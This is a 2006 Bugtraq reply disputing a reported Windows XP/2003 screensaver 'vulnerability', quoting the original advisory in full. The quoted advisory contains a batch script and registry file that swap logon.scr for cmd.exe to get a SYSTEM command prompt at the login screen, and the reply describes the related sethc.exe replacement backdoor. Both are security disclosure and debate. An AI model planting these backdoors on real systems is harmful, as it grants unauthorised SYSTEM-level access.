Re: Default Screen Saver Vulnerability in Microsoft Windows

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Default Screen Saver Vulnerability in Microsoft Windows
From: "Eliah Kagan" <degeneracypressure@xxxxxxxxx>
Date: Wed, 24 May 2006 14:43:45 -0400
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=OrIFjAinFISnSOLLveeYWs/LGtBWJSwLYVll6tYGAIM1FOO/wbzcWnKTW7qXTHnUS8/dZhh3T3atGpffyZqYaDORcAqEMAa/W81RFyLbUiKpGN7Vv+JH/BrEpAmplMZHiX30cKNyRTaqrQB4aD0ePfgjQSEyp6/sktMQQPpwrIs=
In-reply-to: <20060521090700.18448.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20060521090700.18448.qmail@xxxxxxxxxxxxxxxxx>

This is not a vulnerability. If you have access to modify the default
screensaver executable, you already have full access to the system. A
trojan with full system access can always create any backdoor of any
kind. This follows directly from what it means for a process to have
full system access. The ability to make a backdoor once you've
obtained full system access is not a vulnerability.

It would be nice if the screensaver were run as a special restricted
user account for that purpose (or otherwise sandboxed), in case there
turns out to be a vulnerability in the screensaver *executable*
itself, or in case an administrator on the box sets SYSTEM's default
screensaver to a screensaver executable that has a vulnerability. But
that Windows runs login.scr with SYSTEM privileges is not a
vulnerability in and of itself.

Similarly, one can replace sethc.exe (the stickeykeys executable) with
cmd.exe and get a command prompt on top of the login screen by
pressing the shift key five times. This is a much more useful way to
create a universally accessible backdoor while logging in, but it's
not a vulnerability in the Windows operating system, either.

"1. The users of the system should not run any program, script or
software obtained from unreliable source as an administrator or any
user which has the permission to modify the Windows Registry."

This is a preventative measure to stop people from getting full system
privileges in the first place. It is true that you shouldn't let
untrusted people into your house unsupervised, but the reason why is
not that they could then unlock the door from the inside and get in.

-Eliah

On 21 May 2006 09:07:00 -0000, susam.pal@xxxxxxxxx <susam.pal@xxxxxxxxx> wrote:

-- Advisory Name --

Default Screen Saver Vulnerability in Microsoft Windows


-- Author --

Susam Pal


-- Vulnerable Systems --

Windows XP, Windows 2003 Server


-- Vulnerability Description --

This vulnerability has been tested on Windows XP and Windows 2003 Server. The 
screen saver in these systems is allowed to run even when a user hasn't logged 
in. To verify this one has to start windows and wait for the default screen 
saver to appear without logging in. The screen saver should appear after 10 
minutes because that is the default value of screen saver time-out.


Since no user logs in, this screen saver runs as a system process. The registry entries 
for this screen saver running as a system process can be found in the registry-key, 
"HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are the default 
values.


Windows Registry Editor Version 5.00


[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="600"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"


It can be seen that the default time-out value is 600 seconds or 10 minutes.


An attacker can replace the default screen saver (logon.scr) with the command prompt 
(cmd.exe) and reduce the time-out period in a system by using a trojan or some other 
means. Later, the attacker can boot the system and wait for the screen saver to appear 
which is now the command prompt. Since the command prompt now runs as a system process, 
the attacker can perform critical operations including malicious ones. He may even 
execute "explorer.exe" to bring up the Windows GUI along with the desktop, 
start button, etc.


-- Exploit Reg File --

Windows Registry Editor Version 5.00


[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="60"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"


-- Exploit Script --

@echo off

rem ---------------------------------------------------------------------------

rem FileName:           DSSExploit.bat

rem Description:        This script replaces the default windows screensaver

rem                     with command prompt and configures the registry for

rem                     attack

rem Author:             Susam Pal

rem Date:               19th May, 2006

rem ---------------------------------------------------------------------------


rem kill logon.scr if its running

tasklist | find /i "logon.scr"

if %errorlevel% == 1 goto replace

taskkill /f /im "logon.scr"


:replace

rem replace

rename %SystemRoot%\System32\logon.scr logon.scr.bak

copy %ComSpec% %SystemRoot%\System32\logon.scr


rem update the registry keys for default screen saver

set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"

reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1

reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0

reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60

reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr


-- Prevention --

One of the following preventive measures should be taken.


1. The users of the system should not run any program, script or software 
obtained from unreliable source as an administrator or any user which has the 
permission to modify the Windows Registry.


2. Disable screen saver by executing the following command.


reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t 
REG_SZ /f /d 0


Deny everyone all permissions on the registry key, "My 
Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any malicious 
program, script or software from modifying the default screen saver settings. This can be 
done by the following steps.


a. Run "regedit.exe".

b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

c. Right click on the key and select "Permissions".

d. Press "Add" button.

e. Press "Locations" button.

f. If a login window appears, click "Cancel" button.

g. Select the local computer and press "Ok" button.

h. Enter "Everyone" in the text-area for object names and press "Ok" button.

8. Deny "Full Control" permission for "Everyone" and press "Ok" button.


3. Microsoft should release a patch which prevents the screen saver from 
running before a user logs in with proper authentication.


-- Disclaimer --

The information, codes and exploits in this advisory should be used for 
research, experimentation, bug-fixes and patch-releases only. The author shall 
not be liable in any event of any damages, incidental or consequential, in 
connection with, or arising out of this advisory.



-- Contact Information --

For more information, please contact:-


Susam Pal

Infosys Technologies Ltd.

Survey No. 210, Manikonda Village

Lingampally, Rangareddy District

Hyderabad, PIN 500019

India

Phone No.: +91-9985259521

Email: susam.pal@xxxxxxxxx


http://susampal.blogspot.com/

http://securecoding.blogspot.com/

References:
- Default Screen Saver Vulnerability in Microsoft Windows
  - From: susam . pal

Prev by Date: [ MDKSA-2006:089 ] - Updated kphone packages fixes permissions issue with .qt/kphonerc
Next by Date: Re: Default Screen Saver Vulnerability in Microsoft Windows
Previous by thread: Default Screen Saver Vulnerability in Microsoft Windows
Next by thread: Re: Default Screen Saver Vulnerability in Microsoft Windows
Index(es):
- Date
- Thread